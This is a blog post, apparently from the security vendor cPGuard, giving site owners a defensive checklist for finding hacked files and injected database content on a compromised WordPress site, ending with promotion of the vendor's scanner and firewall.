WordPress always the hot choice of website hackers and thus it is one of the web applications that receive major attacks. Especially on a shared web hosting server, it is very much interesting to check and compare the WordPress websites logs against the other websites on the same server. The result will be pretty self-explanatory in most cases, where you can see a ton of brute-force attempts, generic attacks like and targeted attacks to exploit the WordPress websites. The rate of attack attempts will be much higher for WordPress websites compared to the other web apps.
Where you can find the infections
There are many methods to exploit WordPress websites and new types of attacks/vulnerabilities are being reported as time goes on. You can often find the infected code in a WordPress website in
1. The File System where you physically store the Website Files
2. The database associated with the website
In both the above cases, the hackers will add some external code to execute their logic and thus exploit the compromised website.
1. How to find hacked WordPress Files
The hacker targets the files and tries to update/upload the file contents with the malicious code many times. Many times they target the plugins, themes, or the uploads directory but it is not limited to the specific directories. When you can a manual lookup, you can start with the following steps
- Check the DocumentRoot of the website and ensure that there are no unknown files/folders there. Especially if you find any unknown folders or files ( with gibberish names ) you should check them specifically
- Check the wp-content/plugins directory and make sure that there is no plugin directory exists that is not installed by you. Also, search for the latest updated PHP files under the plugins folder and verify the list
- Check the wp-content/themes directory and make sure that there is no themes directory exists that is not installed by you. Also, search for the latest updated PHP files under the themes folder and verify the list
- Ensure that no PHP or other interpreted files are uploaded to the wp-content/uploads folder. This folder is specifically to store media files and thus not supposed to execute any code from it.
- Use wp-cli tool to check the integrity of the core and plugins files. You can refer this link to know how to use it
- You can use any WordPress security plugins like Wordfence to scan and find any other hidden hacked files under the website.
1. How to find hacked WordPress Database contents
This is more tricky compared to finding the compromised files as it needs more manual effort to track the injected code from the database. It is advised to take a backup of the present database before any changes on your website database. To start with the investigation, you can do the following
- Check WordPress admin user list and make sure that the list does not contain unknown users
- Take a dump of the database and search for suspicious content (i.e., spammy keywords, links) that you found abusive in your website
- Check the post contents and take note of any kind of JS injections
- Take a look into the wp_options table and ensure that there are no unexpected entries there.
As I mentioned already, this needs some kind of expertise and if you do not know how to do this please look for an expert hand to do this for you.
How to automate these checks for your website?
The search for malicious code in your files and database is not an easy task and doing it regularly is not an easy task. If you own a single website, what you can do is to depend on a security plugin or a Cloud solution to scan your website regularly and report any bad files. Also you can choose a hosting platform that has automatic virus checks enabled ( cPGuard does it along with WAF protection specifically for WordPress websites ) which can protect your website without any additional installation and cost. If you are a server owner, it is essential to install an anti-virus to protect your customer websites from such attacks and save your server reputation.
cPGuard contains built-in tools to protect your WordPress websites and the WAF module has explicit rules to stop attacks towards WordPress website/components. Our distributed network helps us to detect latest attack attempts, keep the software up to date and to defend the latest WordPress attacks.
